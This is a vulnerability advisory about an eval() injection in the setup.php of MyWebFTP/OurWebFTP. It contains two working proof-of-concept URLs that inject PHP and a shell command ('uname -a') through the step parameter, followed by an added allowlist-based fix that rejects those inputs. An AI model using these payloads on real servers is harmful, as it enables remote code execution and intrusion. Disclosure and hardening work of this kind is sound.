MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability
by condis
04.10.2011

download: http://www.mywebftp.com/download.php
          http://www.ourwebftp.com/download.php

Source of setup.php:

	start_html();
	if( checkReady() ){					// [1] installation preconditions must pass
		init();
		listSetupOptions();
		if ( isset($_REQUEST['step']) ){
			$step = $_REQUEST['step'];
			eval("step_$step();");			// [!] request value reaches eval() unfiltered
		}
	

To exploit this issue, everything must be configured properly so that installation
can be done without any errors [1]. To meet these conditions, all that is needed
is a directory with the name defined in the LD_DIR constant, with permission to
write into it, and that the administrator has not deleted setup.php.


Proof of Concept:
	
	http://host.tld/myftpdir/setup.php?step=;phpinfo();//
	http://host.tld/myftpdir/setup.php?step=;print_r(`uname -a`);//
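
A hardened form of the dispatch shown in setup.php, as an added example (not code from MyWebFTP/OurWebFTP or from the advisory's author): the step value is looked up in a fixed allowlist instead of being passed to eval(). The step names and handler bodies are hypothetical, since the advisory does not show the installer's real step functions.

```php
<?php
// Added example: allowlist dispatch replacing eval("step_$step();").
// Step names and handlers are hypothetical placeholders (assumption);
// the real installer's step functions are not shown in the advisory.

function step_welcome(): string  { return 'welcome'; }
function step_database(): string { return 'database'; }
function step_finish(): string   { return 'finish'; }

// Request value => handler. Nothing outside this map can be called.
const SETUP_STEPS = [
    'welcome'  => 'step_welcome',
    'database' => 'step_database',
    'finish'   => 'step_finish',
];

/**
 * Run the handler for a requested step, or return null when the value
 * is not a known step. The request value is never interpolated into code.
 */
function dispatch_step($raw): ?string
{
    // step[]=x arrives as an array; reject every non-string value.
    if (!is_string($raw)) {
        return null;
    }
    // Exact key match against the allowlist.
    if (!array_key_exists($raw, SETUP_STEPS)) {
        return null;
    }
    return call_user_func(SETUP_STEPS[$raw]);
}

// Constructed inputs: one legitimate step, the two step values from the
// Proof of Concept URLs above, and an array-typed parameter.
$samples = ['database', ';phpinfo();//', ';print_r(`uname -a`);//', ['x']];
foreach ($samples as $input) {
    $result = dispatch_step($input);
    printf(
        "%-30s => %s\n",
        json_encode($input, JSON_UNESCAPED_SLASHES),
        $result === null ? 'rejected' : "ran step '$result'"
    );
}
```

Only the 'database' input runs a handler; the other three are rejected. Deleting setup.php once installation is complete removes this entry point altogether, which is the second precondition noted above.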